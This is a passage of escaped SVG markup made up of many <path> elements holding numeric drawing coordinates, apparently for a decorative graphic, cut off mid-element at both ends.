d=\"M175.7,80.1c-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3,7.9.4-1.4,1.1,4.1,1.5C171.9,80.7,172.1,80.3,175.7,80.1Z\"></path>\n <path d=\"M178.7,80.4c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C181.7,80.9,182.8,80.5,178.7,80.4Z\"></path>\n <path d=\"M322.1,83.9c.5-.3,2.4.2,4.4.2,1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2C321.9,83.3,316.9,83.6,322.1,83.9Z\"></path>\n <path d=\"M480.2,86.8c4.4.2,2.5-.2,6.9-.1l-.3-.3C483.1,86.4,482.9,86.7,480.2,86.8Z\"></path>\n <path d=\"M328.7,81.8c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C330.5,81.6,324.6,81.6,328.7,81.8Z\"></path>\n <path d=\"M180.8,76.4c-1.5-.4,1.3-.5.6-.9-6.1,0,1.9-.6-3.5-.8C174.3,75.1,177.2,75.9,180.8,76.4Z\"></path>\n <path d=\"M317.6,75.6c-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1,0,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4,1.4.5-.1.7-3.5.8,4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.6,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6C315.7,75.9,318.1,75.9,317.6,75.6Z\"></path>\n <path d=\"M125.9,72.3c5.2,0,3,.4,7.3.4,1.9-.1-1.1-.8-3.1-.4-.5-.2,6.5-.6-.7-.8,2.1.6-2.2.8-5.3.3-3.9,0,3,1.1-3.4.9,4.4.4,3.3.6,5,1C130.1,73.5,121.2,72.6,125.9,72.3Z\"></path>\n <path d=\"M277.7,74.5c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C277.5,75.2,277,74.8,277.7,74.5Z\"></path>\n <path d=\"M123.3,69.5c-5.4,0-14.7-.4-18.3-.3,7.2.2,7.8.9,13.6,1.2C114.9,69.7,119.3,69.6,123.3,69.5Z\"></path>\n <path d=\"M314.7,72.3c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C315.3,70.8,321.9,73.3,314.7,72.3Z\"></path>\n <path d=\"M330.1,69.3c-.4.2-.1.5-3.9.3-3.2-1.2,2.4-1.7,7.2-2.9,5.5.3-1.8.8.8.9a21.29,21.29,0,0,1,4.3.1c-1.2-.6,1.8-.8-2.5-1.3-.1.1-.2.3-2.6.2-2-.4.6-.5-2-.7-6.5.1-7.7-.4-7.1-.8a23.81,23.81,0,0,1-4.7.1c1.8-.3-.8-.4.8-.6,2.6.1,4.1.3,3.9.5a9.45,9.45,0,0,1,2.8-.8c1.2-.4-3.8-.4-3.4-.7,5.4.1,7.3-.3,5-.7-6.9-.3-1.4.6-6.5.5-1.3-.5,5-.5.5-1a40.91,40.91,0,0,0,7,0c-4.2-1-.7-1.4-4.7-2.2,2.8.1,2.1.3,5.9.4-3.2-1.6-.5-3.1-5.5-4.7,5.1.2.8-.7,5.3-.4-5.9-.6,2.4-1-4.4-1.8,0,.1-1.7,0-1.5-.1,3.8,0,3,.3,5.9.4-1-.2,1.1-.6-2-.7,0,.1-.2.3-2.6.2-.3-.8,2.5-1.3,5.4-1.7,2.1.4,1.5.5-.8.6,2.7.1,3-.1,5.6,0-4.3-1.1-12.6-1.6-12.2-2.8-5.7-.3-3.1.2-6.8.2.3.3,4,.5,4.8.8-6,.6.6,2.1,1.1,2.9a36.35,36.35,0,0,0-5.9-.3c-.1.3,3,.4,4.7.7-7.2,0,.3,1.3-5.7,1.4.2-.4-8.6-.7-7.1-.2,10.6,0,10.4,2,10.6,2.5,3.6.1-.6.9,3.8,1.2-1.2.1-5.2-.1-4,.2,4.7,0,4.8.9,8.1,1.3-1.8,0-1.8.1-4.2,0,0-.3-.4-.6-4.7-.7,3.6.5,1.6,1.1.3,1.7a22.65,22.65,0,0,0-6.2-.5c4.1.2,0,.5.6.7,1.7,0,3.5.1,5.2.1-.6.3-.6.7,1.3.9-4.4-.2-2.8-.1-7.1-.2.2.3,2.7.4,2,.7-5.3-.2-6.1,0-5.2.4,3.4-.1,2.6-.2,8.1-.3.6.2,2.3.5.6.7-6.6-.6-.7.2-7.1-.2-1.3.5-3.8.9-5.7,1.4,5.4.2.5-.6,6.7-.3a4,4,0,0,1,.6.7c-3.3-.1-5.3-.1-5.5.1,13.5.2,2.9,2,13.6,2.8-2.2-.1-3.7-.2-5.9-.4.6.2-1.7.2-2.5.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5,6,.4.1.5.9,1,6.1.3-.3-.6,3.8-.5.2.1,2.6.2,3,.3,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0C331.5,69.7,332.8,69.4,330.1,69.3Z\"></path>\n <path d=\"M330.6,65.1c.6-.1-2.2-.6.9-.5,1.5,0,3.6,0,1.3-.1-1.9,0-3.8-.1-5.7-.1C329.5,64.6,325.9,64.8,330.6,65.1Z\"></path>\n <path d=\"M330.6,55.6c.4,0,.9.1,1.4.1C331.5,55.7,331,55.6,330.6,55.6Z\"></path>\n <path d=\"M334.3,70.9c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C332.7,72,335.1,71.2,334.3,70.9Z\"></path>\n <path d=\"M100.6,68.9c-4,.2,5,1.1,3.5.8C101.7,69.3,105.1,69.2,100.6,68.9Z\"></path>\n <path d=\"M250.8,72.3c-1,.3,6.7,1,6.1.6C251,72.9,256.6,72.3,250.8,72.3Z\"></path>\n <path d=\"M241.5,72.8c4.4.2,2.5-.2,6.9-.1-.9-.2,1.2-.5-1.9-.6C248.8,72.7,241.7,72.4,241.5,72.8Z\"></path>\n <path d=\"M150.4,70.4c-2.5.6,13.8.6,7.1.2C157.5,71.1,153.1,70.4,150.4,70.4Z\"></path>\n <path d=\"M128.7,69.2c-.9.1-3.5.7-.9.5.1-.4,5.5.4,5.6,0a26.2,26.2,0,0,1-2.8-.1C130.1,69.6,130.7,69.3,128.7,69.2Z\"></path>\n <path d=\"M136.2,68.3c5.7.2-.1.3.6.7,4.6,0,4-.6,10.8-.4-2.8-.1-2.1-.3-5.9-.4.4.2-1.2.2-4.1.1A6.55,6.55,0,0,0,136.2,68.3Z\"></path>\n <path d=\"M151.8,65.6c-1.2.3,3.1.2,3.4.4.3-.1.6-.1.9-.2C154.2,65.8,153,65.7,151.8,65.6Z\"></path>\n <path d=\"M154.8,66.1c-2.7-.1-2.9-.4-5.7-.5-.9.4,4.7.8-.8.7-4.7-.5,2.5-1-3.9-1.3-3.6.5-1.6.3-.3,1.2,7.5.3,4.6.5,12.1,1.1C152.9,66.8,153.1,66.5,154.8,66.1Z\"></path>\n <path d=\"M155.2,66c-.2,0-.3.1-.4.1a.79.79,0,0,0,.4-.1C155.2,66.1,155.3,66,155.2,66Z\"></path>\n <path d=\"M337,70.8c4.1.4.7.5,3.5.8C343.3,71.4,340.9,70.9,337,70.8Z\"></path>\n <path d=\"M504.7,75.1C513,74.8,500.8,73.7,504.7,75.1Z\"></path>\n <path d=\"M111.9,64.4c3.7.6,5,1.3,11.2,1.7C117.3,65.5,118.7,64.6,111.9,64.4Z\"></path>\n <path d=\"M478.4,72.1c-.9.6,2.7,1.4,6.9,1.6C481.2,73.3,483.5,72.5,478.4,72.1Z\"></path>\n <path d=\"M142.5,62.8c-.8-.1-1.7-.3-3.1-.4-4,.2,2.4.5,4.7.7.8,1-2.8,1.1,1.7,1.9.9-.2,5.5.4,7.5.6,1.3-.6-9-1.2-1.3-1.4a22.48,22.48,0,0,0,5.9.4c-1.8-.2-3.8-.4-6.1-.6-1.4-.5,1.9-.6,3.5-.8-2.1-.1-5.2-.1-5.8-.2-.1-.2,9,0,3.9-.3-2.4.2-4.8-.6-9-.7,2.6.5-3.5.1-3.9.4,5.5.2-.1.4,4.8.7A7.34,7.34,0,0,0,142.5,62.8Z\"></path>\n <path d=\"M401,70.9c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C397,70.4,403.4,70.7,401,70.9Z\"></path>\n <path d=\"M250.3,67c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C252.5,66.4,253.3,66.9,250.3,67Z\"></path>\n <path d=\"M115.9,64.2c.3-.4-1.2-.7-4.9-.9,2.2.4,4.2.5.6.7C113.5,64,114.7,64.1,115.9,64.2Z\"></path>\n <path d=\"M102.2,62.9c-2.5.1.9.3,1.9.6-1,.1-8.3.1-3.9.3a19.39,19.39,0,0,1,4.1-.1c1.3-.1,1-.4,2.3-.5A36,36,0,0,1,102.2,62.9Z\"></path>\n <path d=\"M414.4,70.3c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C408.1,70.2,416.9,70.8,414.4,70.3Z\"></path>\n <path d=\"M444.3,71.2c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C445.8,70.7,440.7,70.9,444.3,71.2Z\"></path>\n <path d=\"M279.2,66.6c3.2-.3,5.2.4,7.4.5.7-.6-2.5-1.1.2-1.3C284.1,66,274.1,66,279.2,66.6Z\"></path>\n <path d=\"M212.2,64.8a17.8,17.8,0,0,1-3-.2,26.15,26.15,0,0,0,2.8,0c-1.4,0-2.8-.1-4.2-.1,1.5.2,1,.6,3.4.7C210.7,65,212.6,65,212.2,64.8Z\"></path>\n <path d=\"M113,62.5c-.5.2,3,.8,4.7.5-2.5-.1-3.4-.3-3.2-.5,1.9,0,3.2.1,4.4.2C118.2,62.2,115.3,62.4,113,62.5Z\"></path>\n <path d=\"M45.6,60.2c4.9-.1,1.2.4,4.6.4-1.8-.5.5-1.3-4.3-1.7C47.3,59.4,47.9,59.8,45.6,60.2Z\"></path>\n <path d=\"M133.7,60.7c-9.2-.3-9.2-.5-17.4-.8-1.9,0,.2.4-2.5.4-2.4-.2,1.9-.7-4.9-.9,4.7,1.1,1,1.7,4.8,2.3,0-.2,5.4.2,7.2.3-.5-.6,6.3-.6.3-1.2,5.2,0,10.4-.2,12.8.4a20.27,20.27,0,0,0-2.7,0c2.1,0,5.3.2,5.6,0C134.4,61.2,133.5,61,133.7,60.7Z\"></path>\n <path d=\"M353.4,65.7c3.7.1,6.1.2,6,.5-.9-.1-5.7-.4-5.7-.1a33.79,33.79,0,0,1,4.5.3c0-.3,6.6,0,5.2-.4A79.44,79.44,0,0,0,353.4,65.7Z\"></path>\n <path d=\"M149.1,61c7.9-.3-.5-.7-2.7-1.5,5.7-.3-.1-.6,3.4-.9a33.9,33.9,0,0,1-4.5-.3c0,.1-.2.3-2.6.2,1.1.3,3.4.6-2.4.5,1.9-.5-1.7.1-7.1-.2.4.2-.2.4,1.8.5,0-.7,3.5.7,5.8.2-3.6-.1-.4-.4,2.5-.3.3.6-5.3.6-6,1.1,7.6.2,6.9.9,3.7,1.1,3.1.3,2.7,0,5.8.2.4-.6,10.4-.2,13.4-.6C155.9,60.9,150.9,61.2,149.1,61Z\"></path>\n <path d=\"M333.5,65.2c1.1.1,2.8.1,2.9.2-1.8,0-2.8.1-2.5.3,3.8.1,12,0,5.3-.3-.2.4-3.7.1-1.5-.1A34.6,34.6,0,0,0,333.5,65.2Z\"></path>\n <path d=\"M252.7,63.7c-.6-.5,6.1-.3,6.6-.7-2.3-.3-3.3.1-4.4-.2-1.6-.5,4.4-.6,1.9-1a15.43,15.43,0,0,1-2.8-.1C255.1,62.4,251.8,63.2,252.7,63.7Z\"></path>\n <path d=\"M252.7,63.7c.1.1.2.1.4.2C252.9,63.8,252.8,63.7,252.7,63.7Z\"></path>\n <path d=\"M60.3,59.4c-1.9-.6.6-.7-2.4-1.1C58.8,58.8,52.7,59,60.3,59.4Z\"></path>\n <path d=\"M48.1,58.3c3.4.1,3.5.4,6.1.6-3.1-.5,6.1-.4.7-.7-.6.1-1.3.2-2.5.3A16.74,16.74,0,0,0,48.1,58.3Z\"></path>\n <path d=\"M343.9,64.4a40.66,40.66,0,0,0-8.1.3c3.4.1,3.5.4,6.1.6a17.85,17.85,0,0,0-3.4-.7C340.9,64.5,345.6,64.7,343.9,64.4Z\"></path>\n <path d=\"M135.7,59.9c-1.7-.1-1.7-.2-1.7-.4-6,0-4.2-.5-8.9-.6C126,59.3,134.1,59.9,135.7,59.9Z\"></path>\n <path d=\"M365,64.7c.5-.2-4.3-.7-4.6-.4,3.2.1.4.6,4.7.7-.1-.3,5.4,0,5.3-.3a21.62,21.62,0,0,1-3-.3C368.1,64.6,367.5,64.8,365,64.7Z\"></path>\n <path d=\"M357.6,64.1a79.55,79.55,0,0,1-10-.3c-.9.4-.2.5,3.5.8a29.54,29.54,0,0,1,5.4-.2c.1.1,1.3.2,1.4,0C355.4,64.4,358,64.3,357.6,64.1Z\"></path>\n <path d=\"M79.6,57.7c.3.4,6.4.6,7.8.9C87.3,58.1,82.7,57.9,79.6,57.7Z\"></path>\n <path d=\"M70.6,55.4c-1.8-.1-3.4-.1-3-.3-1.2.2-2.1,1-1.6,1.4a8.16,8.16,0,0,1,2.7,0c-.8.4-3.7.5-4.8.9,1.9.3.9.7,4.9.9C69.6,57,72.3,56.5,70.6,55.4Z\"></path>\n <path d=\"M0,56.3c1,.1,2.5-.1,0-.7Z\"></path>\n <path d=\"M100.5,57.8c-2.5.2-.3.7,2.2.9C98.5,58.2,106.2,58.1,100.5,57.8Z\"></path>\n <path d=\"M104.7,57.8l.2.2a6.8,6.8,0,0,1,1.5.1c4.7.2.8-.3,5.5-.1,1.9.2.8.7,3.5.8-1.9-.4,2-.2,2.4-.4-3.1-.1-1-.4-1.9-.6,4,.2,6.2.3,9.9.2-3.3-.5.2-1.1-2.3-1-2.3.2.2.8-6.5.5,1.1-.1,1.6-.3.9-.5-4.9,0-10.9.3-7.6.8C106.5,57.8,107.4,57.7,104.7,57.8Z\"></path>\n <path d=\"M340.2,63.3c5.9.2-1.2.4,3.3.6-.2-.2,3.7-.1,2.5-.4C342.5,63.6,342,63,340.2,63.3Z\"></path>\n <path d=\"M127.9,57.3c-3.1.2,1.8.8,3.7,1.1C133.7,58.2,128.9,57.7,127.9,57.3Z\"></path>\n <path d=\"M337.8,62.2h-4.2c0-.1-1.3-.2-1.4,0,3.7.1,1.5.5,6,.5C340.3,62.4,337.9,62.5,337.8,62.2Z\"></path>\n <path d=\"M292.9,60.2c-3.4.2-6.4.4-10.7.5,2,.2,5.3.2,7.3.4.2-.2-2.1-.3-3.1-.4C290.9,60.8,295.4,60.6,292.9,60.2Z\"></path>\n <path d=\"M113.6,56.9c6,.1,2.9-.4.8-.6-3.4.1-6.2-.5-7.1-.2C112.3,56.3,115.6,56.6,113.6,56.9Z\"></path>\n <path d=\"M88.3,51.7c-3.5,0-9.8.1-8.1.3,6.5-.3,8.6.6,8.7.4C89.9,52.4,91.5,51.9,88.3,51.7Z\"></path>\n <path d=\"M335.9,56.9c3.4.5-1,.3-3.8.5,4.4,0,4.5.3,7.3.4C339.3,57.4,338.9,57.1,335.9,56.9Z\"></path>\n <path d=\"M197.3,54.2c-2.3,0-.2-.4,1-.4-1.4.2,2.7.6,3,.3-3.2-.5-4.8-.3-8.9-.6C192.4,53.7,194.7,54.5,197.3,54.2Z\"></path>\n <path d=\"M106,51.4c1.4.5-2,.6-4.9.8,9.2.2,6.5-.5,7.6-.8-3.5-.1-3.4-.5-8.8-.5C107.3,51.2,99.1,51.7,106,51.4Z\"></path>\n <path d=\"M37.7,49.5c-3.1-.3,1-.5-2-.7.2.4-8.7.5-3.3,1C31.6,49.5,33.9,49.2,37.7,49.5Z\"></path>\n <path d=\"M0,48.7H0c2.6.2,4.4.2,3.7.2C2.5,48.8,1.3,48.7,0,48.7Z\"></path>\n <path d=\"M0,46.8a37.89,37.89,0,0,0,5.3.7A36.44,36.44,0,0,0,0,46.6Z\"></path>\n <path d=\"M312.8,54.3c.8-.8-.2-1-4.2-1.6,1.3.5,1.6.5-.7.7C317.3,53.7,306.3,54.1,312.8,54.3Z\"></path>\n <path d=\"M272.5,52.7c-1.9-.6,4-1.5-4.6-2.1C273.2,51.3,266.7,51.9,272.5,52.7Z\"></path>\n <path d=\"M195.9,51a15.4,15.4,0,0,1,2.8.1c-.2-.2.8-.3,2.5-.3.1.1.3.1,1.5.1l-.2-.2a27.48,27.48,0,0,1-3-.2C201.7,51,190.3,50.6,195.9,51Z\"></path>\n <path d=\"M357.8,51.8c1.1,0,1.7.1,1.6.3-2.5-.1-8.2,0-4,.2C358.7,52.4,363.6,51.7,357.8,51.8Z\"></path>\n <path d=\"M340.4,51c4,.3-3.5.5.7.8l3.7-.6C341.1,51.3,341.6,50.6,340.4,51Z\"></path>\n <path d=\"M292.6,50.3c0-.1.1-.1,1.3-.1.9,0,1.7,0,1.3-.1-1.7-.1-1.7-.2-1.7-.4,4.9.3,5.2.1,5.5-.1,3.1.2,8.5.2,7.5.6,5.6-.1,6.9-.6,10.4-.9-6.6-.1-5.6.5-12.2.4,1-.4-8-.2-7.5-.6-.4-.5,6,.1,5.3-.3-.5-.4-4.5.1-4.3-.2,4.5-.1-3.2-.3-1.9-.6.8,0,5.2-.2,5.7.1s-1.7.2-2.5.3c2.5,0,4.4.1,5.8.2-.6-.4.5-1.1-7-1.7-3.2.2,2.3.3,1.9.6-5.6.2-7.9,0-4.5-.4-5.8-.1-4.5.5-.7.7a20.82,20.82,0,0,0-4.1.1c1.7.1,4,.1,4.4.2.2.2-.8.3-2.5.3-2.3-.3-4.8-.5-7.6-.7-2.3.1,4.4.8,6.2.7,0,.3,2.5.4,3.3.6-5.3-.1,1.5.5-4.1.1C294.3,49.7,288.5,50,292.6,50.3Z\"></path>\n <path d=\"M276.4,49.3c3.4-.1,7.9-.1,9.4-.3C281.2,49,277,49,276.4,49.3Z\"></path>\n <path d=\"M339.8,50.3c1.2-.2-5.2-.6-5.9-.4,6.9.2-.1.3-1,.4C337.4,50.6,335.4,50.1,339.8,50.3Z\"></path>\n <path d=\"M297.3,41.5c-1-.4-5.8-.9.4-1.1-7.9-.1-5.8-.8-9.4-1.2-7.5.2,8.4,1.2-.1,1.4a7.8,7.8,0,0,0-3-.3c-1.3.5,3.6,1.6-6.9,1.6,5.2.4,5.1.7-.7.7a114.26,114.26,0,0,0,13.6-.3c.3.2,4.8.2,4.5.4a32.67,32.67,0,0,0-3.8.5c2.5,0,4.4.1,5.8.2.9-.3-2.3-.3-1.9-.6,2.1.1,2.6.2,4.5.3.6-.4-3.4-.5-3.5-.8,2.7.1,4.8.2,5.9.3-2.5.6,10.4,1.4,5.7,1.8,5.7-.1,1.3-.7,3.4-.9-1-.2-6.7-.1-7.3-.4l-.3-.3a62.16,62.16,0,0,1,10.2.6c3-.2-4.4-.5-4.9-.9a16.86,16.86,0,0,1,5.3-.3c2.8.3,6.8.4,9,.7a61.84,61.84,0,0,1-7.2-.3c-.4.6,4.7.3,6.2.7.4.4-1.6.6-3.5.8,1.7.1,4,.1,4.4.2-6.7,1-1.8,2.8-9.1,3.8-1.7-.1-1.7-.2-1.7-.4-2.6,0-4.7,0-5.5.1,3.8.4,9.8.6,14.7.9.7.6-4.8-.1-5.3.3,3.6.3,7,.1,11.3.3-4.6-.5.2-.8-5.2-1.2-1.4.1-.1.4-4,.2a53.56,53.56,0,0,1,7.9-.5c-1.8-.5-2.2-1-1-1.1,2.7-.2,2.8.1,5.8.2.7-.4-7-.4-6.3-.8,2.6,0,4.7,0,5.5-.1-9.7-.1,6.2-.6-2.3-1-1.8.1-.2.5-3.8.5-1.1-.6,3.4-.8,6-1.1-1.7-.1-4-.1-4.3-.2,5.8-.3-1.3-1.1,2.5-1.9-6.6-.2-3-.4-3.4-.7-4.4-.2-4,.1-8.4-.1,2.7.5-.6.2-5.3.3-2.4-.8-9.2-1.2-14.1-1.8C297.4,40.6,302.3,41.3,297.3,41.5Z\"></path>\n <path d=\"M333.6,49.5c1.7,0-1.4-.5,5.4-.2,0,.2.7.4,1.6.3-.1-.2-.9-.3-1.7-.4-4.5-.2-5.3.1-8.5-.2C330.8,49.2,329.4,49.5,333.6,49.5Z\"></path>\n <path d=\"M367.4,48.5a78.32,78.32,0,0,0-8.1.3c.9.1,5.7.4,5.7.1C359.8,48.6,368.4,48.8,367.4,48.5Z\"></path>\n <path d=\"M275.4,46.6c4.2.1,10.6-.1,8.1-.3-2.5,0-3.7.2-6.8.2-.3-.2-.1-.4-3.1-.4C273.4,46.3,275.4,46.4,275.4,46.6Z\"></path>\n <path d=\"M302.7,46a24.32,24.32,0,0,1,2.7,0,4,4,0,0,0,1.6.3c-.1-.5,2.2-.9-5.1-1.1C304.7,45.5,302.5,45.9,302.7,46Z\"></path>\n <path d=\"M284.4,44.2c-5-.1-4.1.3-6.6.4,2.4,0,3.8.2,4.3.1C277.9,44.4,286.3,44.5,284.4,44.2Z\"></path>\n <path d=\"M364.1,44.8c-.4.3,2.8.3,1.9.6,7.1.2.5-.3,3.9-.4,3.2,0,1.9.4,4.5.4C375,44.8,366.4,45,364.1,44.8Z\"></path>\n <path d=\"M14.4,32.6l.2.2c8.3.1,1.3.7,3.6,1,0-.1.1-.1,1.3-.1.3.1,0,.3,1.7.4,2-.4-1.8-.9-2.7-1.5Z\"></path>\n <path d=\"M331.4,40.7c3.3.2,4.1-.4,7,0a20.27,20.27,0,0,0-2.7,0c9,0,1.7-.5,3.4-.9a61.71,61.71,0,0,0-6.8.2C338.5,40.4,332.5,40.6,331.4,40.7Z\"></path>\n <path d=\"M275.3,38.6c5,.3-1,.6,6.2.8-.7-.3-3.2-.5-.6-.7C277.9,38.8,275.4,38.3,275.3,38.6Z\"></path>\n <path d=\"M291.1,39.2c-.1-.1-.2-.3-.4-.4-2.1-.1-7.2,0-7.2-.3,1.2.1,2.7-.7-.8-.9-3,.3,2.4.9-2,.9C284.8,38.7,286.3,39,291.1,39.2Z\"></path>\n <path d=\"M347,39.6c2.6-.2-1.3-.5,1.4-.7-3.9.2-6.5,0-7.2.4C343.2,39.4,344.1,39.5,347,39.6Z\"></path>\n <path d=\"M284.9,36.9c1.6.1,10.2.7,8.8.5-4.1-.2-.6-.5.9-.5a33.9,33.9,0,0,1-4.5-.3c-2.5.1,2.2.4-2.4.4C286.1,36.9,285.4,36.7,284.9,36.9Z\"></path>\n <path d=\"M339.4,37.2c1.1,0-2.9-1.2-3.7-1.1C335.2,36.9,335.9,36.8,339.4,37.2Z\"></path>\n <path d=\"M356.1,37.3c-1.7-.1-1-.1-.2-.2a82.15,82.15,0,0,0-9.8-.1C348.7,37,355,37.3,356.1,37.3Z\"></path>\n <path d=\"M328.3,34c3.8-.4,6.4.2,11.2.1C338.9,33.6,326.7,33.5,328.3,34Z\"></path>\n <path d=\"M341.4,33.2c-.6-.5,9.6-.7,1.7-1.2C347.4,32.8,335.6,32.6,341.4,33.2Z\"></path>\n <path d=\"M145.4,77.3a2.39,2.39,0,0,0-.5-.6c-3.8-.3-4.9,0-7.2-.3.2-.2,2.2-.2,5.5-.1a19.89,19.89,0,0,0-6.5-1c1.7.7-4,.9.2,1.7C141,77.1,141.2,77.1,145.4,77.3Z\"></path>\n <path d=\"M231.3,75.4c-6.2-.2-7.8-.1-11.1,0,.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3C224.8,75.5,229.3,75.9,231.3,75.4Z\"></path>\n <path d=\"M212.5,69.8c-5.6.1-.3.7,2.3,1-.2.1-1.4.1-2.6.2-2.3-.1-.1-.5-4.6-.5,2.2.8.8.9-.1,1.4,5.7-.4,8.1.4,12.8.3-4.8-.3,8.1-.3,2.2-.7-2.2.2-5.9-.6-3.5-.8-2.1-.3-5.2,0-5.8-.2-2.3-.5,2.4-.5,5.4-.2a81.66,81.66,0,0,0-11.9-.9C205.7,69.6,211.8,69.6,212.5,69.8Z\"></path>\n <path d=\"M173,70.8c.1,0,.1-.1,0,0C173,70.7,172.9,70.8,173,70.8Z\"></path>\n <path d=\"M178.1,68.7c-11-.1-4.3,1.3-5.1,2a18.73,18.73,0,0,1,4.1,0c-4.4.4,3.2,1.3,3,1.8,1.1-.6,2.6-1.4-1.7-1.9,3.6-.1,2.4-.3.8-.6,2.5,0,4.5.1,5.8.2a66.74,66.74,0,0,0-11-1.4C176.3,68.9,179,69,178.1,68.7Z\"></path>\n <path d=\"M1494.6,118.8c1.9.1,2.8.2,5.8.2,1.1-.1,1.6-.3.9-.5C1497.4,118.5,1497.6,118.8,1494.6,118.8Z\"></path>\n <path d=\"M1495.9,117.1c1.1.5-1.1,1.2,5.3,1.3C1500.3,118,1504.4,117.5,1495.9,117.1Z\"></path>\n <path d=\"M1463.9,110.8c-6.5-.3-4.6.5-.9.5C1462.3,111.1,1462.9,110.9,1463.9,110.8Z\"></path>\n <path d=\"M1495,109.8c-2.4.1-.2.6,2.1.8C1496,110.3,1498.2,109.9,1495,109.8Z\"></path>\n <path d=\"M1692,112.7c.1.8-2.5-.3-7.2-.3a38.09,38.09,0,0,0,6.3.8,10.17,10.17,0,0,1,2.7,0C1693.4,113,1693.9,112.7,1692,112.7Z\"></path>\n <path d=\"M1463,106.5c-4.5-.1-4.6.2-5.2.4a16.67,16.67,0,0,0,4.7.7c.9-.3-2.5-.4-3.3-.6,3.2.1,5.3.1,5.5-.1C1463,106.8,1463,106.7,1463,106.5Z\"></path>\n <path d=\"M1472.4,99.9c-3-.2-1.8,0-5.7-.1,1,.3,1.1,1.1-3.7.6,6.8,0-.4-.9,3.2-1.1a38.82,38.82,0,0,0,5.9.3c-1.2-.4-.2-.3-4.7-.7,1.8-.3,6.5.4,5.5-.1-.2-.4-4.4,0-3.3-.6,4.3.3,3.6-1-2.5-1.3,0,.5-1.5.6,2.3,1-11.1,1.2-12.1,3.5-6.2,5.5-2.9.1-2.9.4-5.1.5,4.5.8-4.6,2,4.8,2.3-2.8-1,1.5-2.4.9-3.7-.3-.6-4.1-1.4,1.4-1.5-.3.1-1.8.2-1,.4,8.9.1-.5-.8,3.4-.9.9.4,3.9.2,1.9.6,3.8.1,3.5-.1,3.9-.3C1470.8,100.6,1469.7,99.9,1472.4,99.9Z\"></path>\n <path d=\"M1701.7,100a23.82,23.82,0,0,1-2.8-.1,20.27,20.27,0,0,0-2.7,0c-3.3,1.9-8,3.1-7.5,5.7,2.3.2,6.1.3,7.5.6-7.8-.4-.8.9-8.1.3-.7.5-.9.9,2.6,1.4-1.6-.6,3.5-.1,5.6,0-.3-.2,0-.3,1-.4-2.4-.3-6.1-.2-7.3-.4,1.5-.4,4.7-.2,9.3-.4-3.1-.5.2-.5.6-.9-8.1-.2-1.1-.8-5.2-1.2,1.8,0,1.8-.1,4.2,0-2.2-.4-.9-.8.4-1.1-1.7-.1-3.3-.2-4.5-.3C1701.6,102.1,1696.9,100.8,1701.7,100Z\"></path>\n <path d=\"M1710.2,106.5c-3.6-.1-5.3,0-5.3.3,2.6.1,3.1.2,1.6.3,1.4,0,2.8.1,4.2.1C1709.2,106.8,1709.2,106.8,1710.2,106.5Z\"></path>\n <path d=\"M1705,103.8c1.4.4-1.3.5-.6.9C1710.6,104.9,1709.3,103.9,1705,103.8Z\"></path>\n <path d=\"M1697.2,99.7c-.1-.4,2.4-.6,6.4-.6C1698.4,98.6,1692,99.5,1697.2,99.7Z\"></path>\n <path d=\"M1653.7,97.6c1.4.4-5.1.7-.4,1.1C1652.9,98.3,1657.8,98,1653.7,97.6Z\"></path>\n <path d=\"M1326.8,90.8c1.4,0,2.8.1,4.2.1.4-.2,2.7-.5-2-.7C1328.4,90.4,1325.8,90.4,1326.8,90.8Z\"></path>\n <path d=\"M1684,97.3c0,.3.9.6,3.4.7C1686.4,97.8,1689.1,97.3,1684,97.3Z\"></path>\n <path d=\"M1696.1,95.3c10.3.3.8-.7,4.6-1.1C1692.8,94.2,1699.1,94.9,1696.1,95.3Z\"></path>\n <path d=\"M1742,95.2c-1.3.1-2.4.6.7.8C1743.9,96,1745,95.4,1742,95.2Z\"></path>\n <path d=\"M1715.4,93.4c1.1.1,2.8.1,3,.2-1.1,0-1.6.1-1.2.2,3.8.1,3.5-.1,3.9-.3C1717.4,93.4,1716.3,93.1,1715.4,93.4Z\"></path>\n <path d=\"M1742.4,91c.9.2-1.1.5,1.9.6C1746.4,91.5,1748.7,91.1,1742.4,91Z\"></path>\n <path 